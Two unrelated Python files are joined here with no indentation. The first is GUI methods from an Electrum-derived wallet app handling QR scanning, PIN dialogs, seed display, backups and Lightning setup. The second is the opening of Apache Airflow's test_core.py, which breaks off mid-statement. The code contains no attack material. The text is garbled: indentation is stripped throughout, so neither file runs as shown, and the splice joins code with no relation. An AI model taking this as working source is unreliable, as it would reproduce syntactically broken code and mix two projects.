def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-ravencoin.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
backup_dir = util.android_backup_dir()
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
test_core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep, time
from bs4 import BeautifulSoup
from airflow.executors import SequentialExecutor
from airflow.models import DagModel, Variable, TaskInstance, DagRun
from airflow import jobs, models, DAG, utils, settings, exceptions
from airflow.models import BaseOperator, Connection, TaskFail
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.utils.file import TemporaryDirectory
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.exceptions import AirflowException
from airflow.configuration import (
AirflowConfigException, run_command, conf, parameterized_config, DEFAULT_CONFIG
)
from jinja2.exceptions import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
from tests.test_utils.config import conf_vars
if six.PY2:
# Need `assertWarns` back-ported from unittest2
import unittest2 as unittest
else:
import unittest
NUM_EXAMPLE_DAGS = 24
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle # type: ignore
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
session = Session()
session.query(DagRun).filter(
DagRun.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
